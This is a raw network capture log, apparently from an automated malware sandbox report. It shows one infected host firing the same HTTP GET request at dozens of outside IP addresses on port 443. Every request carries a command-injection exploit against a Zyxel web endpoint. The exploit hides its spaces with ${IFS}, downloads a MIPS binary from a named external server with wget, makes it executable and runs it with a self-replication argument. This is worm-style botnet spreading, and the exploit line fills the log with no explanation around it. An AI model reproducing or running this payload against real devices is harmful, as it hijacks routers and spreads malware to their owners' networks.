                                                        Jan 28, 2024 10:12:51.382992029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4143192.168.2.1448498193.26.236.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383028030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4144192.168.2.1445362125.222.245.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383061886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4145192.168.2.1459050147.184.89.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383122921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4146192.168.2.1436272221.221.171.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383147955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4147192.168.2.145252091.127.182.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383181095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4148192.168.2.143897053.195.104.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383240938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4149192.168.2.1447720184.128.57.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383269072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4150192.168.2.1440772179.235.97.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383305073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4151192.168.2.1445988110.207.214.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383363008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4152192.168.2.143493497.14.94.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383373976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4153192.168.2.1451898136.114.233.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383423090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4154192.168.2.145680641.66.200.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383471012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4155192.168.2.1439052116.76.173.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383483887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4156192.168.2.143716279.235.180.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383523941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4157192.168.2.1459222155.17.0.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383563995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4158192.168.2.1442478181.135.231.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383627892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4159192.168.2.1453830140.242.185.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383651018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4160192.168.2.14372345.88.181.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383686066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4161192.168.2.144492482.236.236.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383698940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4162192.168.2.1455086134.151.73.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383757114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4163192.168.2.1452604203.27.151.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383784056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4164192.168.2.144876467.47.222.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383819103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4165192.168.2.1442440189.124.218.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383861065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4166192.168.2.1457400156.243.187.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383874893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4167192.168.2.1446000129.79.232.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383897066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4168192.168.2.14398488.14.198.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383930922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4169192.168.2.144847614.129.16.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.383954048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4170192.168.2.1436884182.172.98.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384000063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4171192.168.2.1458816129.245.223.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384053946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4172192.168.2.1458190207.228.146.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384088039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4173192.168.2.145786262.224.17.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384131908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4174192.168.2.144336684.60.222.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384159088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4175192.168.2.143770046.188.154.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384197950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4176192.168.2.143972251.177.180.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384219885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4177192.168.2.1442154175.209.242.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384279013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4178192.168.2.143666454.122.225.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384299040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4179192.168.2.1448134121.98.216.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384361029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4180192.168.2.1451828152.63.134.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384386063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4181192.168.2.1441822109.216.13.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384428978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4182192.168.2.1460354143.116.190.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384478092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4183192.168.2.144595862.41.29.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384516954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4184192.168.2.1449916123.124.173.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384555101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4185192.168.2.145584624.212.179.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384605885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4186192.168.2.145447812.170.30.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384644985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4187192.168.2.144007861.3.166.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384668112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4188192.168.2.1452028174.4.166.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384691954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4189192.168.2.1444008174.65.240.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384736061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4190192.168.2.145384625.203.38.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384757996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4191192.168.2.143361695.53.136.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384788036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192192.168.2.1459932175.203.183.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384833097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4193192.168.2.145491877.177.105.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384849072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4194192.168.2.1434210117.50.167.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384888887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4195192.168.2.1460190179.246.196.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384944916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4196192.168.2.1450898212.230.133.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.384987116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4197192.168.2.144305235.129.105.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.385021925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4198192.168.2.1445080148.23.53.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388262033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4199192.168.2.1457394189.23.126.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388288975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4200192.168.2.144365676.144.115.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388339996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4201192.168.2.1445088155.148.54.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388366938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4202192.168.2.1454982128.138.197.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.388427019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4203192.168.2.1436026174.203.247.61443
                                                        TimestampBytes transferredDirectionData
